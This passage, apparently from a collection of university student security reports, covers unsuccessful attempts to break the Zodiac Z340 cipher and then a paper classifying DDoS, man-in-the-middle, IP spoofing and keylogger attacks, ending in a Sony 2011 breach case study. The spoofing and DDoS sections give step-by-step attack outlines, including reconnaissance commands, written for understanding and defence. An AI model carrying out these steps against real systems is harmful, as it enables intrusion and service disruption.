sentence “when I die I will be reborn in paradice” which likely indicates the killer might have a belief in God or at least the resurrection of the body, and the life everlasting, although what he did was horrible. As a killer, he might consider himself as a “Moses” who could kill people according the “words” from God. The “words” might be what he read from the Holy Bible and chose to show the public that he was following God’s commands. This religious link gave us a deep thinking about how the killer was trying to encrypt the message. We got two possible ways: 1) the cipher contains the names of the books, chapters and verses; 2) only those symbols are useful to give meaningful result. For the first way, it will take a long time to decrypt the cipher because we are not familiar with all the books of the Holy Bible. With the limited time, we choose to try the second one. We mention the first possible way in this report to help people who have a better understanding of the Holy Bible to decrypt the cipher. For the second way, what we did is trying to use the zodiac tool to encrypt the By checking the zodiac tool, the symbols. symbol has the highest frequency, which means the symbols probably contain the useful information. However, when we replaced the symbols with “J”, we got a map of “J” strings. Figure 8. 131 We saw the “J” string with randomness but the positions were readable. We believed that the positions of each “J” to indicate the chapters and books. For example, the top left “J” with position (1, 2), which indicate the book 1 and chapter 2, i.e. Genesis chapter 2.[5] Verse 1: Thus the heavens and the earth, and all the host of them, were finished. And the second “J” with the position (2, 5) indicates the book 2 and chapter 5, i.e. Exodus chapter 5. Verse 1: Afterward Moses and Aaron went in and told Pharaoh, “Thus says the LORD God of Israel: ‘Let my people go, that they may hold a feast to Me in the wilderness.’” By using this method, we believe the Z340 contains only religious information from the killer, which were chosen by the killer to “educate” his “slaves”. Therefore, it will not reveal the identification of the killer. However, this is just one of the approaches to solve the cipher which cannot be verified. 4.3 Analyzing the special features and IC Let’s take a closer look at the 340-cipher. We exam the Symbol density map, the Row repeat map, column repeat map and highlight first occurrences symbols. Figure 9: Symbol density map Figure 10: Row repeat map 132 Figure 11: Column repeat map Figure 12: Highlight first occurrences of symbols And the following are the Index of Coincidence: Index of coincidence, Entropy, Chi2: IoC: 0.0194. By row: 0 · 0 · 0 · 0.029 · 0.007 · 0.007 · 0 · 0.007 · 0.007 · 0.015 · 0 · 0 · 0 · 0.015 · 0 · 0.007 · 0.015 · 0.022 · 0.007 · 0 (Average: 0.007). By col: 0.005 · 0.026 · 0.026 · 0.016 · 0.011 · 0.042 · 0.011 · 0.011 · 0.021 · 0.021 · 0.032 · 0.016 · 0.021 · 0.026 · 0.011 · 0.016 · 0.021 (Average: 0.017). Ratio to IoC of random letters: 0.5468. Entropy: 5.7453. By row: 0.491 · 0.491 · 0.491 · 0.471 · 0.485 · 0.485 · 0.491 · 0.485 · 0.485 · 0.479 · 0.491 · 0.491 · 0.491 · 0.479 · 0.491 · 0.485 · 0.479 · 0.473 · 0.485 · 0.491 (Average: 0.485). By col: 0.571 · 0.548 · 0.551 · 0.563 · 0.565 · 0.537 · 0.565 · 0.565 · 0.553 · 0.553 · 0.545 · 0.559 · 0.553 · 0.551 · 0.565 · 0.559 · 0.557 (Average: 0.473). Chi2: 0.4039. By row: 15.248 · 15.248 · 15.248 · 12.541 · 14.345 · 14.345 · 15.248 · 14.345 · 14.345 · 13.443 · 15.248 · 15.248 · 15.248 · 13.443 · 15.248 · 14.345 · 13.443 · 12.54 · 14.345 · 15.248 (Average: 14.436). By col: 16.72 · 13.177 · 14.063 · 15.835 · 15.834 · 12.292 · 15.834 · 15.834 · 14.063 · 14.063 · 13.177 · 14.949 · 14.063 · 14.063 · 15.834 · 14.949 · 14.949 (Average: 12.485). 133 Figure 13. There are two repeated trigrams in the 340 cipher and , both of which appear twice. The most frequent digrams are as follows, each appearing three times: , , , With some seven other diagrams repeated twice. The ‘+’ symbol is the most frequently occurring symbol, with 24 occurrences in all, it far exceeds all other symbols in frequency. The average number of characters between each repetition of a symbol is 76.4. The average number of repeated symbols per line is 0.9. Comparison between the first cipher and the 340-cipher offers some interesting facts. They are both the same width of 17 columns. Computing the index of coincidence for both cipher 340 and the first cipher, we get an answer of 0.02 for both of them, which suggests that they are very similar in design. The difference in the number of characters is interesting, as the 340-cipher has a larger cipher alphabet in fewer characters. This suggests that if the homophonic format was maintained, the alphabet was expanded to provide greater security. To examine some specifics, we looked at the two repeated trigrams . All of these symbols have a higher than average occurrence (10 to and 12). In fact ‘F’ is the most frequently occurring symbol after ‘+’. This would indicate that their plaintext counterparts appear less frequently in English, assuming that cipher 340 is still some type of homophonic cipher. The lower frequency letters in English are starting from the bottom: Z, J, X, Q, K, V, G, B, Y, W, M, F, P, U…, so to match these, it would be useful to recognize a trigram from these lesser used letters. 134 Examining the behavior of the symbol F, it is followed by the symbol ‘B’ three times, but preceded by the symbol ‘B’ once. It is also followed as well as preceded one time each by the symbol ‘backwards K’. Since ‘F’ is both followed and preceded by ‘B’, let’s examine the behavior of ‘B’. It is also both followed and preceded by another symbol than ‘F’, ‘backwards Y’. This ‘backwards Y’ only appears five times in the text, suggesting that it might be a very high frequency letter. So these two letters both followed and preceded by two other symbols. This rules out ‘q’, which is always followed by the same letter, ‘u’, in English (assuming no intentional misspelling). We tried numerous combinations of replacements in the cipher, and each seemed to hold some promise, but none of them proved sound upon further investigation. One point that we believe deserves further investigation is the phenomenon noted earlier in the first cipher, and its possible meaning for the second cipher. I noted that the letter ‘A’ had been encrypted using two symbols that also encrypted ‘S’. Note that one encryption for ‘A’ is the letter ‘S’. My reasoning on this point is that, rather than this being a mistake, there is the possibility that this was a deliberate double encryption. The ‘A’ was encrypted as ‘S’, and then the ‘S’ was then encrypted again into the two triangles. Also note that one of those symbols is the triangle with a dot in the middle, which has a role to play in the fantastical analysis. We assert that perhaps there are multiple levels of encryption in the second cipher. 4.4 Second attempt – Zodiac signature The three methods were our first attempt for solve the Z340. However, as all the three methods didn’t work, we decided to do more research on how the Z408 is cracked. The Z408, which was sent on August 1st, 1969, was encrypted as a homophonic substitution cipher. One week later, on August 8th, 1969, Donald and Bettye Harden, residents of Salinas California, successfully decrypted the cipher. The Harden's method was based on their deduction that the message would contain the words “kill” and “I” [6]. We think that the Z340 is also encrypted by the homophobic method and this is also believed by lots of code-breakers who are trying to solve the cipher. However, the Z408 is decrypted in one week, so if the Z340 is encrypted in exactly the same way as the Z340, the Z340 shouldn't remain a myth for more than 40 years. Besides, because the Z340 is sent three month later after the Z408 is broke, the zodiac killer should have come up with more methods to make the Z340 even harder to break. Base on the above analysis, we conclude that, the Z340 is still encrypted by the homophobic but with an improved and even harder method. When we read an article about how the author thinks the Z340 should be solved, we just got inspired. May be the Zodiac killer change the order of the characters and we should read the Z340 along the way of the zodiac signature. That is we should read the cipher by circle instead of from left to right and from top to bottom. Figure 15 shows the idea more clearly. 135 Figure 14.The Zodiac signature Figure 15. The way we read the cipher Each of us try to break Z340 based on this idea, however, none of us get any useful information. It will have a lot of work to do as we have to use the brute force method. Because of the time limit and lack of man power, finally, we give up breaking Z340 in this way. 5. Related work There is lots of work being done for the cipher Z340, and we value one website a lot, zodiac tool, which is actually being introduced in the part 4.1. We will discuss more details about this website: http://oranchak.com/zodiac/webtoy/. Mainly, there will be three parts: the purpose of the website, what functions the website can perform and the results have been got using the website. The purpose: The website is to help code-breakers break the cipher Z340 using the simple monoalphabetic homophonic substitution method. The zodiac tool developer believes that Z340 is encrypted by the homophonic substitution method because Z408 is broke using this method. Functions: Figure 16 is how this website looks like and it mainly contains seven parts. With these seven parts, we can change the any symbol to any English alphabet (can be done in part 1 and part 2) as well as automatically get the corresponding letter frequency (as it shows in part 6) after the changes being done. Beside, we will get the decoded ciphertext automatically to make the ciphetext more readable (as it shows in part 4). The website even can find the words (as it shows in part 4), which make it easier to see if we get some useful results. 136 Results: with the help of this tool, there is still nobody successfully break Z340. However, with some substitution, we can get the words like halloween, killing, you, next, die, zodiac. Figure 16. The website: zodiac tool 6. Summary To break cipher Z340, we mainly use four methods: the partial break method and find the Identification number of the zodiac killer in this cipher, find clue from the Bible, read the cipher by the way of the zodiac signature and analyzing the special features and IC of 340-cipher. However, none of these four methods works to break the cipher Z340. The cipher Z408 is broke in only one week, why cipher Z340 remains a myth for more than 40 years? Is that just because zodiac killer increase the number of symbols or he improved his encrypt method? It seems that the advanced technology don’t help a lot in breaking this cipher. Maybe, we will come up with a strange idea to break this cipher during a tea break and it turns out this is just the answer! Reference: 1. Voigt, T. (November 4, 2007). Zodiac Letters. Retrieved October 10, 2011 from http://www.ZodiacKiller.com/Letters.html 137 2. Wikipedia The Free Encyclopedia. (October 5, 2011). Zodiac Killer. Retrieved October 10, 2011 from http://en.wikipedia.org/wiki/Zodiac_Killer 3. Farmer, C. (2007). The Zodiac 340 Cipher Solved. Retrieved October 10, 2011 from http://www.opordanalytical.com/articles1/zodiac-340.htm 4. Wikipedia The Free Encyclopedia. (October 6, 2011). Social Security Number. Retrieved October 10, 2011 from http://en.wikipedia.org/wiki/Social_Security_number 5. Holy Bible (New King James Version,1982). Thomas Nelson, Inc. 6. Thang D. (December, 2007). Analysis of the Zodiac Z340. A Project Report Presented toThe Faculty of the Department of Computer Science, San Jose State University. Page 17. 138 The sampler of network attacks Guang Yi Ho, Sze Ling Madelene Ng, Nur Bte Adam Ahmad, and Siti Najihah Binte Jalaludin School of Computing, National University of Singapore, Computing 1, 13 Computing Drive, Singapore 117417, Republic of Singapore {u0907064, u0907056, u0807104, u0907055}@nus.edu.sg Abstract. Attacks over the years have become both increasingly numerous and sophisticated. Computer and network systems fall prey to many attacks of different forms. To reduce the risks associated with such attacks, it becomes imperative that organizations and individuals understand and assess them, and make prudent decisions regarding the defenses to be in place. Understanding the network attack characteristics allows for better decisions made in selecting the appropriate barriers. To develop these understandings, we have chosen to classify four network attacks in a comprehensive manner , namely Distributed denial of service attack, Man in the middle attack, Spoofing and Keylogger attacks. This paper focuses on the provisioning of the categorization of the above network attacks, thus providing a greater comprehension of the attacks in terms of the different dimensions. In addition to that, this paper will also explore the case on Sony‟s latest attack, in relation to the network attacks. 1. Introduction The evolution of technology has allowed most of the organizations to conduct their operations over the Internet, regardless of their geographic location. However, with the power of the Internet, it has led to an increase in system attacks over the years. As seen in Fig.1 (Refer to Appendix A: System Attacks Frequency), most of the organizations are susceptible to system attacks. In addition to viruses, worms and Trojans, the next top three attacks that organizations face are malware, botnets and web-based attacks. We will be discussing on the in-depth analysis of these attacks later in this report. Besides that, the motivation of an attacker has also evolved over the years. Ten years ago, it was mainly driven by the curiosity of learning more about the system. Over the years, attackers are becoming more aggressive, and motivations are leaning more towards financial gains. In this report, four different types of systems attacks will be discussed, namely Distributed Denial of Service, Man-in-the-middle, Spoofing and Keylogger attacks. Each of the attacks will entail its history, the motivations behind it, and how it is carried out. Thereafter, there will be a system classification of the network attacks according to different factors, followed by the discussion of a case study on Sony’s attack. The term “attacker”, “intruder” and “hacker” will be used interchangeably throughout this report. 139 2. Our Approach We will show how the four system attacks can be classified into four different areas; CIA Triad Classification, Scale of Severity Classification, Probability of Occurrence Classification and Probability of Detection Classification. Three out of four classifications are based on two methodologies; National Institute of Standards and Technology (NIST) Risk Management Guide and Michael Whitman‟s Risk Assessment Methodology. The CIA classification is based on the CIA Triad Information Security Model. The Probability of Occurrence and Probability of Detection classification is based on NIST‟s Risk Assessment Methodology. The objective of this classification is to measure the probability of such attacks using a qualitative approach. Since it will be difficult to justify quantitatively how often does an attack occur and how could it be detected easily, the NIST approach provides a basis to derive the probability based on our analysis on the environment of the system attacks. The Scale of Severity Classification is based on Michael Whitman‟s risk assessment methodology. Michael Whitman‟s approach uses quantitative measures such as weighted scores to evaluate the value of a criteria. For example, the weighted score of each criteria allows us to calculate to the total weighted score to determine the overall ranking. 3. Types of Attacks 3.1 Distributed Denial Of Service Distributed denial of service (DDoS) attacks involves many computers and connections, such that the target server will be flooded by many requests. DDoS attacks employ standard TCP/IP messages, which takes advantage of the weaknesses in the IP protocol stack, to disrupt Internet services. Many DDoS attacks are sourced from bot networks or botnets. Those defenses that are built upon observing large packets coming from a single destination will crash, as DDoS attacks come from all over the networks. Historical perspective. The first DDoS attack occurred in August 1999, when a DDoS tool called Trinoo was deployed in at least 227 systems. This flooded a single Minnesota computer and the system was down for more than 2 days. Yahoo! also became a victim of a DDoS attack, where it became inaccessible for 3 hours, and it suffered a loss amounting to about $500,000. This caused them to either stop functioning completely or experienced a significantly slow system. One of the worrying issues about DDoS attacks is that the handler gets to choose the location of the agents. Motivations. DDoS attacks are launched not to steal sensitive information, but to render target systems inaccessible, preventing legitimate users from using a specified network resource. Other incentives include political “hacktivisim” or just plain old ego. How DDoS is carried out. The following steps are as follows: Step1: An intruder searches for systems on the Internet that can be compromised, by using a stolen account on a system with a large number of users or via inattentive 140 administrators. Many of such systems are often found on university campuses. (Refer to Appendix B: Distributed Denial of Service, Fig.2) Step 2: The intruder loads the compromised system with hacking tools such as DDoS programs. This compromised system(ie. DDoS master /handler) finds other Internet hosts that it can also install its DDoS daemons (agent/zombie) on. The daemon is a compromised host that runs a special program. The intruder searches for systems running services that have security vulnerabilities via scanning large ranges of IP network address blocks. This is when the initial mass-intrusion phase will happen. Step 3: The subsequently exploited systems loaded with the DDoS daemons will carry out the actual attack (Refer to Appendix B Distributed Denial of Service, Fig.3). The zombie program can be planted on the infected hosts via an attachment to spam email. Communication from the zombie to its master can be hidden by using standard protocols such as HTTP, IRC, ICMP or even DNS. Step 4: The intruder maintains a list of owned systems, consisting of compromised systems with the agents. The actual DDoS attack phase occurs when the intruder runs a program at the master system. This will inform the agents to start the launch of the attack to the victim. (Refer to Appendix B Distributed Denial of Service, Fig.4) 3.2 Man-in-the-Middle Man-in-The-Middle(MITM) attack is classified as a type of active attack is where an attacker intrudes between the communication of two victims to intercept data being transferred, and inject false information. Users are usually unaware if they are really visiting the real website. It takes quite a great deal of skill to differentiate between an authentic and a bogus website. The attacker establishes a connection with their victims, and messages will be relayed between the attacker and the victim, causing the victim to believe that they are communicating within a private connection, when in fact the attacker is actually controlling and monitoring their activities with malicious intention. Historical Perspective. One of the earliest known MITM attack was carried out by the Aspidistra transmitter during World War II. Aspidistra is a British medium wave radio transmitter used for black propaganda and military deception. It intruded into German radio frequencies by transmitting on its frequencies when German radio transmitters were switched off during air raids and retransmitting the network broadcast as if it was still broadcasting. Thus making it sound like it came from official German sources. The Aspidistra transmitter modified news broadcasts by inserting false content and pro-Allied propaganda, causing panic and confusion among listeners. Motivations. The motivation behind a MITM attack is to access accounts with unauthorized access and take advantage of privileges to modify or steal data, to be used for their financial gain. Attackers also perform actions to deny authorized users from using the online services and resources. How MITM is carried out. A common MITM attack is the Phishing Attack on Web-Based Financial System. Phishing Attacks on Web-based Financial Systems. Phishing aims to gain control of customer‟s information by behaving as a proxy between the customer and the real web-based application. The affected groups of users of are usually E-business 141 services and financial systems where identity thefts are performed on unsuspecting customers. The attacker aims to intercept between a customer and a merchant bank by enticing the customer to enter their credentials on a bogus bank website. The customer will enter their credentials and the one-time code from a token (if website requires two-factor authentication). Even when the two-factor authentication approach is in place, it provides no such protection against the phishing attack. All these are done with the customer completely unaware that a MITM attack is ongoing. The attacker will have the ability to use the credentials on the real banking website to access the customer‟s bank account. The attacker is now able to carry out malicious activities such as performing fraudulent transactions directly with the bank. Future transactions will direct the customer to the malicious proxy server instead of the real bank‟s server, which results in DNS Cache Poisoning. Both HTTP and HTTPS communications are vulnerable to phishing attacks. Attacks on HTTP connections are carried out with the attacker establishing a simultaneous connection between the customer and the real site. The attacker proxies all the communications between the customer and the bank in real-time. In the case of HTTPS connections, the attacker‟s proxy will establish an SSL connection with the customer and create an SSL connection between itself and the bank‟s server, allowing the attacker to capture and „record all traffic in unencrypted state. 3.3 Spoofing Spoofing is a situation whereby a person or a program mimics to be someone by modifying the data to gain unauthorized access to the system. Spoofing has been “increasingly popular across the wireless network and they are usually the generator of all other attacks in the wireless network.” Some of the common types of spoofing are email spoofing, ARP Spoofing, Content Spoofing and IP Spoofing. The scope of this report will be focusing on IP Spoofing. IP Spoofing. IP Spoofing is a “hijacking technique” whereby it allows the attacker “to gain unauthorized access to the computers by sending messages to a computer with an IP address indicating that the message is sent from a trusted host.”It can be done simply by replacing the source of the message with an internal or trusted IP address. IP Spoofing can be used to launch various attacks. Some of the common attacks are blind spoofing, non-blind spoofing and denial of service attacks. Blind Spoofing. In blind spoofing attack, the attacker, located outside the network, “sends multiple packets to the target computer to obtain and analyze the different sequences.” This allows the attacker to “predict the next number sequence”, and deceive the system by “injecting the data into the stream of packets without having to authenticate him/herself.”1 Denial of Service Attack. “To prevent a large-scale attack on a machine or a group of machines from being detected, IP Spoofing is commonly used for DoS attacks.” By spoofing the IP address, it can “extend the DoS attack as long as possible by increasing the difficulties of tracing the source of the attack.” 142 Historical Perspective. In the 1980s, the concept of IP Spoofing was initially discussed in the academic circles. The author of the April 1989 article entitled “Security Problems in the TCP/IP Protocol Suite”, S.M Bellovin of AT & T Bell labs, is one of the first who have identified IP spoofing as a real risk to computer network. In the article, S.M Bellovin “describes how the creator of the now infamous Internet Worm, Robert Morris, figured out how TCP created sequence numbers and forged a TCP packet sequence.” Motivations. IP Spoofing is being employed “to commit online criminal activity” such as spamming and denial of service (DoS) attacks. These attacks involve large amounts of information transmitted over the network. With the use of the bogus IP address as the source of the message, it will hide the origin of the message, preventing the attacker from being detected. Also, IP Spoofing is being employed to breach network security. Due to the use of “bogus IP address that mirrors one of the addresses on the network”, logging on to the network no longer requires any username and password. Attacker can easily “bypass any authentication method and illegally access the network.” How IP Spoofing is carried out. Step 1: Detecting a Trusted System. The attacker must first identify the system that the target system trusts and establish a trusted relationship based on the authentication by IP address. This can be done via using the commands such as rpcinfo –p and showmount –e, through social engineering and method of brute force. Step 2: Blocking a Trusted System. Once the trusted system has been identified, the attacker must proceed to block it by performing the SYN Flooding DoS attack on it, resulting in the available memory on the trusted system to be completely taken up. This prevents the trusted system from responding to any SYN/ACK packet sent from the victim system. Step 3: Getting the Final Sequence Number and Predicting the Succeeding Ones. After the trusted system has been blocked, the attacker must proceed to obtain the sequence number of the target system. To obtain the sequence number of the target system, “the attacker can connect to port 23 or port 25 (TCP Ports) just before the launch of the attack and obtain the sequence number of the last packet sent by the target system.” Step 4: The Actual Attack. Once the sequence number has been obtained, the attacker is ready to launch the actual attack. The attacker must first send a SYN packet attached with the spoofed IP address to the victim system. “This SYN packet is addressed to the rlogin port (513) and it requests for a trust connection to be established between the victim system and the trusted system.” The victim system will respond to the SYN packet by sending a SYN/ACK packet back to the trusted system. SYN/ACK packet sent by the victim system will be discarded as it has been blocked. The attacker can then send an ACK back to the victim system. This ACK message is designed such that it consists of a spoofed address that makes it seem to originate from the trusted system. “It also includes an ACK number whose value is the predicted sequence number plus 1.” If everything is successful, a trust relationship would be established between the victim and the attacker. (Refer to Appendix D: Spoofing, Fig. 6) 3.4 Keylogger 143 Keylogging attack, also known as keystroke logging attack is a type of malware where malicious attackers use a keylogger to log keystrokes on a victim‟s computer. The keylogger can come in the form of a hardware device or a program to steal sensitive information and track user input, including the URL that users visited. Keylogger attacks are a threat to many organizations and personal activities as information can be captured before the encryption is being performed (Refer to Appendix E: Keylogger, Fig.9). Keyboard is still the main method to enter the input on the computer. Thus, the attacker can easily obtain valuable information by recording the keystrokes. Furthermore, attacker can easily predict users‟ behavior via the sequence of typing order when the user logs into their email account. The keystrokes are then stored in a log file on the compromise machine and sent to the attacker without the user knowing it. (Refer to Appendix E: Keylogger Fig.10) Historical Perspective. It was known that the early keylogger program was written by Perry Kivolowitz when he was still an undergraduate. The source code was posted to Usenet news groups on November 17, 1983. [34] Although attackers use keylogger to carry out cyber crimes, it can be used for law enforcement purposes. Motivations. The purpose is to steal sensitive information such as username, password, credit card number, bank account number and others, in order to have access to the organization‟s confidential information. Blackmailing of the organization is often the case once attackers have access to such information. How Keylogging is carried out. Common keyloggers include Software keylogger and Hardware keylogger. Each will have its own way of how keylogging is carried out. Software Keylogger. There are three types of software keyloggers; kernel based, hook based and user space. It captures data remotely and affects large number of machines by installing the program into the computer. When users open the file that has already been infected with the virus, the program will then be installed into the computer automatically without the users noticing it, capturing the keystrokes between the keyboard interface and the Operating System (OS). Hardware Keylogger. Hardware keylogger uses a connector, such as PS/2 (Refer to Appendix E: Keylogger, Fig.11) or a USB keylogger (Refer to Appendix E: Keylogger, Fig.12) to connect between the keyboard and the computer to capture keystrokes. Once the keylogger is connected to the machine, it will start recording the keystrokes, and store it in the device‟s own hard drive. Hardware keylogger requires physical access to input the connector to the machine itself and to retrieve the logged data. 4. System Attacks Classifications 4.1 CIA Classification (Information Security Model) The CIA Triad security model is used to identify which component of the CIA Triad Security Model is affected by the system attacks. Classifying the system attacks under the CIA triad gives us a better understanding on the security components that were breached. A brief definition of the CIA components are stated below. 144 Confidentiality: Sensitive and confidential information is protected from unauthorized access Integrity: Data is protected from modification and deletion Availability: Systems, resources and services must be available at all times when needed System Attacks Distributed Denial Of Service (DDoS) IP Spoofing Keylogging CIA Classification CIA Reasons ( Confidentiality, Integrity, Availability) Breach of Availability In our opinion, DDoS attack breaches availability of the data. This is because once the DDoS attack is being successfully launched, the target server will be flooded with requests and hence cause the server to be inoperable. The service or data will be unavailable, and thus prevent those legitimate users from using a specified network resource such as a website, web service, or computer system. Breach of Confidentiality, Integrity and Availability Breach of Confidentiality In our opinion, IP Spoofing breaches confidentiality, integrity and availability of the data. Firstly, integrity is breached because IP Spoofing- based attack usually requires the attacker to modify the source of the message to make it appear to have originated from a trusted source. Secondly, confidentiality is breached because once the attacker has successfully launched any IP Spoofing-based attack, they will be able to gain authorized access to any computer system or network and hence enable them to obtain many confidential information. Lastly, availability is breached because IP Spoofing can be used to launch denial of service attack. With the use of a spoofed IP Address, it increases the difficulty in detecting the source of the attack. In our opinion, keylogging breaches the confidentiality of the data. This is because once keylogging attack is successfully launched, the attacker will be able to log the various keystrokes on the victim computer and hence enable them to gain unauthorized access 145 Man-InThe-Middle (MITM) Breach of Confidentiality, Integrity and Availability to their confidential information. Confidentiality is breached because communication among computers can be eavesdropped by the attacker. By eavesdropping, the attacker will be able to gain unauthorized access to the data communicated across the different system. Secondly, there is integrity breach as the attacker can intercept a communication and modify the message before sending back to the destination. Availability is also breached as the attacker has the ability to intercept, destroy/modify the message, with the aim of ending the entire communication among the different computers. 4.2 Probability of Occurrence Classification This classification identifies how likely system attacks will be carried out. The probability of occurrence are expressed in qualitative terms and can be described into three qualitative categories; „Frequent‟, „Occasional‟ and „Remote‟. The definition of the three probabilities are explained below. Frequent: The system attack may occur once or several times Occasional: The system attack may occur once or a few times Remote: The system attack is unlikely to occur but cannot rule out possibility of occurrence System Attacks Distributed Denial of Service (DDOS) IP Spoofing System Attacks and its Probability of Occurrence Probability of Reasons Occurrence In our opinion, DDoS attack occurs quite frequently as it can be performed easily with minimum Frequent resources and expertise needed. Due to the growing trend of do-it-yourself attack tools and botnets for hire, even a computer novice can execute a successful DDoS attack. With the ease of executing this attack and the amount of damage this attack can bring, it gives the attackers a greater incentive to launch the DDoS attack. Remote In our opinion, IP Spoofing-based attack does not occur frequently but it does occur a few times. This is due to the high complexity of the attacks where it usually involves a large number of resources and high technical knowledge from the 146 Keylogging Frequent Man-InThe-Middle Occasional attackers. Although the complexity of the attacks is high, there is still a possibility for attacker to launch IP Spoofing-based attack if they have managed to exploit certain vulnerabilities and are equipped with the necessary resources and technical expertise. In our opinion, keylogging attack can take place very frequently. This is because keylogging attack can be very easily performed by any staff with just a hardware in the organization. Once this hardware is being plugged into the connector, it will start to monitor the keystrokes of the user. In our opinion, MITM attack can occur occasionally. This is because MITM attacks can be relatively easy to perform if the attacker has the knowledge of the specific technique to perform the MITM attacks. In addition to that, because of the huge benefits that the attacker will receive from MITM attack, such as obtaining and accessing confidential information that flow between computers, attackers wouldn‟t want to miss out on such an opportunity. 4.3 Probability of Detection Classification This classification identifies the probability of users detecting such attacks in their system. The probability of detection can be described as High, Medium, Low. With the probability of detection, we could also identify the potential to reduce or prevent the computer attacks before it propagates , hence causing more damaging effects. The reasons describe what constitutes a HIGH, MEDIUM, LOW for each of the attack classification. The definition of the three probability levels are explained below. Attacks Distributed Denial of Service (DDoS) Range Low IP Spoofing Low Probability of Detection Classification Reasons Often, the communication between the master and agents are very well hidden that it becomes complex to even locate the master computer. Techniques are frequently employed to intentionally hide the identity and location of the master within the DDoS network. Thus, with the existence of such techniques, it makes it that much harder to even identify, detect or analyze an attack in progress. More often than not, administrators do not even know that their systems have been affected. The probability of detecting a spoofed IP packet is low as the source address been modified by the attacker. Thus it makes it more difficult for those networks monitoring 147 Man-inthe-Middle attack Low Keylogger (hardware) Low software program to detect the source of the attack. It requires technical techniques in order to detect man in the middle attack such as complex cryptography protocols, identifying the certificates authority if it is trusted and others. If users do not have such level of technical skills, they may not be able to detect that their actions have been monitored by the attacker. Often, hardware keylogger is not easily detectable due to its small physical size. Also, it is unable to be detected by any software program unless the user performs a physical examination on the keyboard cable. Thus, if the user does not do any probing, the keylogger will still continue monitoring the user‟s keystrokes. 4.4 Severity Classification (Complexity of Attack and Scale of Damage) This classification determines the severity resulting from the system attacks. The ranking of severity are derived based on the weighted scores of the „Scale of Damage‟ and „Complexity of Attack‟ criteria. We would also like to find out if attackers require any prior knowledge related to computer networks or systems to perform such attacks. Scale of Damage includes the types of resources that were affected after the outcome of the attacks and how does it affect the organization as a whole. Complexity of attack refers to the technical skills, knowledge and expertise that were required by the attackers to launch the attacks. The total weighted score will provide a better insight on the attacks‟ level of complexity and how difficulty level the attacks can be carried out, and how the scale of damage can be impactful it to the society or organization. (Refer to Appendix F for more details on the reasoning) Attacks Distributed Denial of Service IP Spoofing Main-in-the Middle Keylogger (hardware) Total Scale of Damage (60%) 1 Complexity of Attack (40%) 0.5 Weighted Score (%) Overall Ranking 1*0.6 + 0.5*0.4 = 80% 2 0.8 1 1 0.6 0.8 0.4 0.3 2.8 2.6 1*0.8 + 1*0.4 = 88% 1*0.6 + 0.8*0.4 = 68% 0.4*0.6 + 0.3*0.4 = 36% 272% 3 4 5. Case Study: Sony Corporation In this section, we will be discussing about the various vulnerabilities which was in fact, completely overlooked by Sony Corporation, and how those weaknesses had paved way for attacks to be launched against Sony. Some of the attacks have been 148 discussed above. This section will also include providing our opinions on countermeasures that Sony can possibly take to increase its security system. 5.1 Background of Sony Attacks 2011 has been a bad year for Sony Corporation and its users, as the organization has been a victim of security breach. A group of hackers, known as Lulz Security, had hacked into Sony’s system. Sony was forced to shut down their system to solve this crisis, and even had to offer free credits for the online games to their users as a form of compensation. In the following sections, we will be discussing more about the type of attacks Sony faced, suggested countermeasures and how it is linked to some of the system attacks that has been discussed in the first section. 5.2 Sony Case Study Classification The goal of this classification is to identify the potential vulnerabilities associated with the system attack, and the type of attacks which stemmed from the vulnerabilities. The attacks‟ corresponding consequences are also identified. In the case of Sony Corporation, research and analysis has to be carried out to determine what are the areas of weakness in Sony Corporation system environment that might be exploited. With the list of vulnerabilities we have identified, it would be possible to derive the attacks and its associated consequences. The consequences describes the impact to Sony‟s business/operation if the system attacks were to occur. Suggested Vulnerabilities/ Weaknesses in Sony’s system Sony has failed to patch their servers regularly. Sony did not perform adequate testing on their database. Sony allowed the reuse of the same password for different Sony‟s services and other websites. Sony did not encrypt the data in the database (eg. Passwords Classifications for Sony’s Case Study Attacks that Consequences Sony encountered Distributed Denial of Service (DDoS) SQL Injection Brute Force Attack Data Theft This will cause disruption in services and bring about great inconvenience to normal users due to this high traffic of requests that is being flooded at the server side. Data such as user‟s personal information and Sony‟s website data were being accessed and manipulated, which resulted in website defacement. This resulted in the attacker to be able to get the username and password from other sources to easily launch a successfully brute force attack. As the data are unencrypted, attacker will then be able to take advantage of such vulnerabilities and steal the data. Consequently, the attacker can log in to 149 were kept in plaintext form) and Sony did not implement a password strength check Sony‟s users accounts using those stolen information. Database server can also be easily hacked as the passwords entered by the user may not easy to decipher. 5.3 Types of Attacks according to Sony Case 5.3.1 Distributed Denial of Service (DDoS) DDoS attacks were targeted on several services such as Sony PlayStation Network, its Qriocity music streaming service, and Sony Online Entertainment. Large amounts of traffic sent caused the web server to be unresponsive. The attack caused disruption, making it difficult for their customers to use their services. This caused huge financial losses and their goodwill were adversely affected. Anonymous, a hacktivist group responsible for the attacks, had used botnets and a simple DDOS tool called the Low Orbit Ion Cannon (LOIC) to perform such attacks. From the case study of Sony, we can see how the DDOS attack (discussed in the first section) has been put into practice and how it had affected the whole organization. 5.3.2 SQL Injection The hackers had used a SQL injection attack to access and expose data on Sony. SQL injection occurs when it exploits the vulnerabilities in input validation to run arbitrary commands in the database. Thus, it allows an attacker to insert a database query where it is able to fool the data server into running malicious code that will reveal sensitive information or otherwise compromise the server. In the case of Sony, the hackers accessed the passwords, email addresses, home addresses and dates of birth of nearly one million users, and also stole all admin details of Sony Pictures, thus, compromising the privacy of personal information of the site visitors. Often, the attacker can take complete control over the underlying operating system of the SQL server, or Web application, and ultimately, the Web server itself. From this attack that Sony had faced, we can see that beside the four system attacks that we have mentioned in the first section, there are many other new system attacks coming up that a large corporation may be vulnerable to. Hence large corporation such as Sony Corporation must be constantly prepared for any upcoming system attacks that can cause them to have large damage and losses. 5.3.3 Brute Force Attack Sony Corporation also encountered brute force attacks where it caused around 93,000 of Sony user accounts being compromised, forcing Sony to lock these 93,000 accounts and to reset the passwords. According to the data released by Lulz Security, about 92% of the Sony users used the same password on multiple Sony websites. Also, some of the common passwords used by the users are "seinfeld", "123456" and "password". As seen from the suggested vulnerabilities, it can be deduced that Sony Corporation does not 150 incorporate a strong defense mechanism against possible attacks. One such example is the enforcement of poor password policy on their users. This then makes Sony a susceptible and high target for the hackers to conduct a brute force attack to access those accounts. Since users may often have the habit to reuse the same password for their other accounts, such as for their email, it becomes that much easier for the hacker to carry out keylogging attacks. This becomes even more so with the low probability of being detected by any software program or by the user. By obtaining the database server password, the hacker is then able to obtain all the users‟ emails and passwords. Then attacker is able to use the obtained list of information to carry out brute force attack by using the different possible combinations to gain access to Sony services – Play Station Network and Sony Online Entertainment. 5.3.4 Data Theft DDoS attacks were targeted on 